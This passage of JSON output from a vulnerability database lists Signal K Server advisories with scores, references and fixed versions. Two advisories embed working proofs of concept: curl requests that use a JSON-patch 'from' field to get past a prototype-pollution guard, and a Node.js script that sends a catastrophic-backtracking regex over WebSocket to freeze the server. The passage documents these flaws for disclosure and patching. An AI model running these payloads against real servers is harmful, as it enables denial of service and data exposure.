                            "vulnerability": "VCID-xvyj-f4ps-kycx"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.19.0"
                }
            ],
            "aliases": [
                "CVE-2025-68620",
                "GHSA-fq56-hvg6-wvm5"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-84tp-z2dz-u7at"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90081?format=api",
            "vulnerability_id": "VCID-jq2a-wxb1-dufm",
            "summary": "Signal K Server: Arbitrary Prototype Read via `from` Field Bypass\n## Summary \n\nThe /signalk/v1/applicationData/... JSON-patch endpoint allows users to modify stored application data. To prevent Prototype Pollution, the developers implemented an isPrototypePollutionPath guard. However, this guard only checks the path property of incoming JSON-patch objects. It completely fails to check the from property. Because JSON-patch operations like copy and move extract data using the from property path, an attacker can construct a payload where from targets /__proto__/someProperty, completely evading the security check and successfully executing an Arbitrary Prototype Read.\n\nWhile this does not allow arbitrary code execution (as the destination path remains protected from __proto__), it does allow a user to exfiltrate internal Node functions and prototype state into their own application data.\n\n## Vulnerability Root Cause \n\nFile: src/interfaces/applicationData.js (Lines 48-57)\n```\nconst DANGEROUS_PATH_SEGMENTS = ['__proto__', 'constructor', 'prototype']\n\nfunction isPrototypePollutionPath(pathString) {\n  const segments = pathString.split(/[./]/)\n  return segments.some((seg) => DANGEROUS_PATH_SEGMENTS.includes(seg))\n}\n\nfunction hasPrototypePollutionPatch(patches) {\n  return patches.some(\n    // [!VULNERABLE] Only checks patch.path, completely ignores patch.from\n    (patch) => patch.path && isPrototypePollutionPath(patch.path) \n  )\n}\n```\nAt Line 201:\n```\nif (hasPrototypePollutionPatch(req.body)) {\n  res.status(400).send('invalid patch path')\n  return\n}\njsonpatch.apply(applicationData, req.body) // jsonpatch natively resolves 'from'\n\n```\n## Proof of Concept (PoC)\n\nVerify the Developer Guard Works (The Blocked Payload):\n```\ncurl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -d '[{\"op\": \"add\", 
\"path\": \"/__proto__/polluted\", \"value\": \"hacked\"}]'\n```\nResult: 400 Bad Request - invalid patch path\n\nExecute the Bypass (The Malicious Payload):\n```\ncurl -X POST http://localhost:3000/signalk/v1/applicationData/global/testapp/1.0 \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -d '[{\"op\": \"copy\", \"from\": \"/__proto__/toString\", \"path\": \"/stolen\"}]'\n```\nResult: 200 OK - ApplicationData saved The security guard is bypassed and the json-patch engine successfully copies the __proto__ internal function reference.\n\n<img width=\"1222\" height=\"230\" alt=\"Screenshot 2026-03-24 150440\" src=\"https://github.com/user-attachments/assets/5ae580fd-284f-4bef-adc8-31b50b8751b6\" />\n\n## Security Impact\nThis vulnerability allows a low-privileged authenticated user to bypass prototype boundary filtering to extract internal functions and properties from the global prototype object this violates data isolation and lets a user read more than they should.\n\n## Fixing Arbitrary Prototype Read\n\nThe hasPrototypePollutionPatch function must be updated to inspect ALL path-related fields:\n```\nfunction hasPrototypePollutionPatch(patches) {\n  return patches.some(\n    (patch) => \n      (patch.path && isPrototypePollutionPath(patch.path)) ||\n      (patch.from && isPrototypePollutionPath(patch.from))\n  )\n}\n```",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35038",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00067",
                            "scoring_system": "epss",
                            "scoring_elements": "0.2089",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00067",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20769",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00067",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20833",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00067",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20876",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35038"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-qh3j-mrg8-f234",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-qh3j-mrg8-f234"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35038",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35038"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qh3j-mrg8-f234",
                    "reference_id": "GHSA-qh3j-mrg8-f234",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qh3j-mrg8-f234"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110924?format=api",
                    "purl": "pkg:npm/signalk-server@2.24.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2e2f-qt4n-dqa7"
                        },
                        {
                            "vulnerability": "VCID-ndfm-uuf3-nbfg"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.24.0"
                }
            ],
            "aliases": [
                "CVE-2026-35038",
                "GHSA-qh3j-mrg8-f234"
            ],
            "risk_score": 1.4,
            "exploitability": "0.5",
            "weighted_severity": "2.7",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jq2a-wxb1-dufm"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49548?format=api",
            "vulnerability_id": "VCID-mg7j-punt-3yhj",
            "summary": "Signal K Server Vulnerable to Denial of Service via Unrestricted Access Request Flooding\nA Denial of Service (DoS) vulnerability allows an unauthenticated attacker to crash the SignalK Server by flooding the access request endpoint (`/signalk/v1/access/requests`). This causes a \"JavaScript heap out of memory\" error due to unbounded in-memory storage of request objects.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68272",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00085",
                            "scoring_system": "epss",
                            "scoring_elements": "0.24609",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00085",
                            "scoring_system": "epss",
                            "scoring_elements": "0.24667",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00085",
                            "scoring_system": "epss",
                            "scoring_elements": "0.24723",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00085",
                            "scoring_system": "epss",
                            "scoring_elements": "0.24733",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68272"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/commit/55e3574d8266fbc0ed8e453ad4557073541566f5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/commit/55e3574d8266fbc0ed8e453ad4557073541566f5"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-02T18:55:06Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68272",
                    "reference_id": "CVE-2025-68272",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68272"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-7rqc-ff8m-7j23",
                    "reference_id": "GHSA-7rqc-ff8m-7j23",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-7rqc-ff8m-7j23"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-7rqc-ff8m-7j23",
                    "reference_id": "GHSA-7rqc-ff8m-7j23",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-02T18:55:06Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-7rqc-ff8m-7j23"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/73159?format=api",
                    "purl": "pkg:npm/signalk-server@2.19.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2e2f-qt4n-dqa7"
                        },
                        {
                            "vulnerability": "VCID-3s8j-v31f-pyaf"
                        },
                        {
                            "vulnerability": "VCID-jq2a-wxb1-dufm"
                        },
                        {
                            "vulnerability": "VCID-ndfm-uuf3-nbfg"
                        },
                        {
                            "vulnerability": "VCID-v11p-jkzw-vkar"
                        },
                        {
                            "vulnerability": "VCID-xvyj-f4ps-kycx"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.19.0"
                }
            ],
            "aliases": [
                "CVE-2025-68272",
                "GHSA-7rqc-ff8m-7j23"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mg7j-punt-3yhj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90197?format=api",
            "vulnerability_id": "VCID-ndfm-uuf3-nbfg",
            "summary": "Signal K Server has an Unauthenticated Regular Expression Denial of Service (ReDoS) via WebSocket Subscription Paths\n## Summary\nThe SignalK server is vulnerable to an unauthenticated Regular Expression Denial of Service (ReDoS) attack within its WebSocket subscription handling logic. By injecting unescaped regex metacharacters into the `context` parameter of a stream subscription, an attacker can force the server's Node.js event loop into a catastrophic backtracking loop when evaluating long string identifiers (like the server's self UUID). This results in a total Denial of Service (DoS) where the server CPU spikes to 100% and becomes completely unresponsive to further API or socket requests.\n\n## Description\nThe vulnerability stems from flawed string-to-regex conversion in `signalk-server/src/subscriptionmanager.ts`. The `contextMatcher()` and `pathMatcher()` functions convert wildcard strings (e.g., `*`) into regular expressions to match incoming data against client subscriptions.\n\nWhile the code escapes `.` and rewrites `*` into the wildcard `.*`, it passes every other regular expression metacharacter through unescaped—such as `+`, `(`, `)`, `?`, `[`, and `]`—so the user-supplied string is compiled as a regex rather than treated as a literal pattern. Because of this, an attacker can submit a crafted `context` that contains nested quantifiers (e.g., `([a-z0-9:-]+)+!`). When the server attempts to test this malicious regex against legitimate, lengthy data identifiers (like `vessels.urn:mrn:signalk:uuid:d384dc156010`), the regex engine fails to find a match at the end of the string but initiates billions of catastrophic backtracking operations trying to resolve the nested combinations. Since Node.js runs on a single-threaded event loop, this locks up the thread indefinitely.\n\n## Affected Code Blocks & Files\n**File:** `signalk-server/src/subscriptionmanager.ts`\n\n**Affected lines for Context subscriptions (282-300):**\n```typescript\nfunction contextMatcher(...) 
{\n  if (subscribeCommand.context) {\n    if (isString(subscribeCommand.context)) {\n      const pattern = subscribeCommand.context\n        .replace(/\\./g, '\\\\.')\n        .replace(/\\*/g, '.*')\n      const matcher = new RegExp('^' + pattern + '$') // VULNERABILITY: User input compiled into regex directly\n      return (normalizedDeltaData: WithContext) =>\n        matcher.test(normalizedDeltaData.context) ||\n```\n\n**Affected lines for Path subscriptions (276-280):**\n```typescript\nfunction pathMatcher(path: string = '*') {\n  const pattern = path.replace(/\\./g, '\\\\.').replace(/\\*/g, '.*')\n  const matcher = new RegExp('^' + pattern + '$') // VULNERABILITY: Same issue here\n  return (aPath: string) => matcher.test(aPath)\n}\n```\n\n## Proof of Concept (PoC) Steps\n\n```\nconst WebSocket = require('ws');\nconst http = require('http');\n\nconst HOST = 'localhost';\nconst PORT = 3000;\nconst WS_URL = `ws://${HOST}:${PORT}/signalk/v1/stream?subscribe=none`;\n// Use the API endpoint to measure real server processing lag (requires JSON serialization)\nconst HTTP_URL = `http://${HOST}:${PORT}/signalk/v1/api/`;\n\nconsole.log(`[+] Target Server API: ${HTTP_URL}`);\nconsole.log(`[+] Target WebSocket: ${WS_URL}`);\n\nlet requestCount = 0;\n\n// Polling function to check server responsiveness and compute delay\nfunction checkServerStatus() {\n    const startTime = Date.now();\n    requestCount++;\n    const reqId = requestCount;\n    \n    const req = http.get(HTTP_URL, (res) => {\n        let size = 0;\n        res.on('data', chunk => { size += chunk.length; });\n        res.on('end', () => {\n             const latency = Date.now() - startTime;\n             console.log(`[HTTP #${reqId}] API responded in ${latency}ms (Data size: ${size} bytes)`);\n        });\n    });\n\n    req.on('error', (err) => {\n        console.log(`[HTTP #${reqId} ERROR] Connection refused/dropped.`);\n    });\n\n    // Timeout if the event loop is blocked\n    req.setTimeout(2000, () => 
{\n        console.log(`[HTTP #${reqId} TIMEOUT] Server is completely blocked! Node event loop is frozen.`);\n        req.destroy();\n    });\n}\n\n// Start polling every 1 second\nconsole.log('[+] Starting baseline HTTP polling...');\nconst pollInterval = setInterval(checkServerStatus, 1000);\n\n// Wait a few seconds to establish a baseline, then launch the ReDoS\nsetTimeout(() => {\n    console.log(`\\n[!] Initiating WebSocket connection to launch ReDoS attack...`);\n    const ws = new WebSocket(WS_URL);\n\n    ws.on('open', () => {\n        console.log('[+] WebSocket Connected! Sending catastrophic ReDoS payload...');\n        \n        // This regex exploits the unescaped Regex metacharacters in context matcher.\n        // It forms: `^vessels\\.([a-z0-9:-]+)+!$`\n        // When evaluated against `vessels.urn:mrn:signalk:uuid:xxx` (38+ characters), \n        // the nested quantifier `([a-z0-9:-]+)+` will result in 2^38 evaluations \n        // because it fails to find the '!' at the end. This reliably freezes V8.\n        const pocPayload = {\n            context: \"vessels.([a-z0-9:-]+)+!\",\n            announceNewPaths: true,\n            subscribe: [{ path: \"*\" }]\n        };\n\n        ws.send(JSON.stringify(pocPayload));\n        console.log('[!] Payload sent. The server should instantly freeze. Watch the HTTP pollers now...\\n');\n    });\n\n    ws.on('error', (err) => {\n        console.error(`[-] WebSocket Error: ${err.message}`);\n    });\n\n}, 3500);\n\n// Automatically shut down the test after 15 seconds\nsetTimeout(() => {\n    console.log(`\\n[+] Test complete. Stopping pollers.`);\n    clearInterval(pollInterval);\n    process.exit(0);\n}, 15000);\n```\n<img width=\"1003\" height=\"524\" alt=\"Screenshot 2026-03-29 101918\" src=\"https://github.com/user-attachments/assets/4b257c4c-f97a-4812-b812-ce2f235b6039\" />\n\n## Impact\n\nThis vulnerability achieves a complete **Denial of Service (DoS)** against the SignalK server. 
A single unauthenticated WebSocket connection can send the catastrophic payload, which blocks the main Node.js event loop for a time that grows exponentially with the length of the identifier being matched — in practice the server never becomes responsive again. \n\n<img width=\"999\" height=\"153\" alt=\"Screenshot 2026-03-29 101820\" src=\"https://github.com/user-attachments/assets/54214d1c-252f-4533-ad02-14959ea2bed0\" />",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39320",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00075",
                            "scoring_system": "epss",
                            "scoring_elements": "0.22678",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00075",
                            "scoring_system": "epss",
                            "scoring_elements": "0.22587",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00075",
                            "scoring_system": "epss",
                            "scoring_elements": "0.22633",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00075",
                            "scoring_system": "epss",
                            "scoring_elements": "0.22694",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39320"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/commit/215d81eb700d5419c3396a0fbf23f2e246dfac2d",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T19:36:30Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/commit/215d81eb700d5419c3396a0fbf23f2e246dfac2d"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/pull/2568",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T19:36:30Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/pull/2568"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.25.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T19:36:30Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.25.0"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-7gcj-phff-2884",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T19:36:30Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-7gcj-phff-2884"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39320",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39320"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-7gcj-phff-2884",
                    "reference_id": "GHSA-7gcj-phff-2884",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-7gcj-phff-2884"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/111518?format=api",
                    "purl": "pkg:npm/signalk-server@2.25.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.25.0"
                }
            ],
            "aliases": [
                "CVE-2026-39320",
                "GHSA-7gcj-phff-2884"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ndfm-uuf3-nbfg"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49550?format=api",
            "vulnerability_id": "VCID-p96m-n138-a7c6",
            "summary": "Signal K Server Vulnerable to Unauthenticated Information Disclosure via Exposed Endpoints\nAn unauthenticated information disclosure vulnerability allows any user to retrieve sensitive system information, including the full SignalK data schema, connected serial devices, and installed analyzer tools. This exposure facilitates reconnaissance for further attacks.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68273",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02939",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02956",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03009",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68273"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/commit/ead2a03d8994969cafcca0320abee16f0e66e7a9",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/commit/ead2a03d8994969cafcca0320abee16f0e66e7a9"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-02T18:55:48Z/"
                        }
                    ],
                    "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68273",
                    "reference_id": "CVE-2025-68273",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68273"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-fpf5-w967-rr2m",
                    "reference_id": "GHSA-fpf5-w967-rr2m",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-fpf5-w967-rr2m"
                },
                {
                    "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-fpf5-w967-rr2m",
                    "reference_id": "GHSA-fpf5-w967-rr2m",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
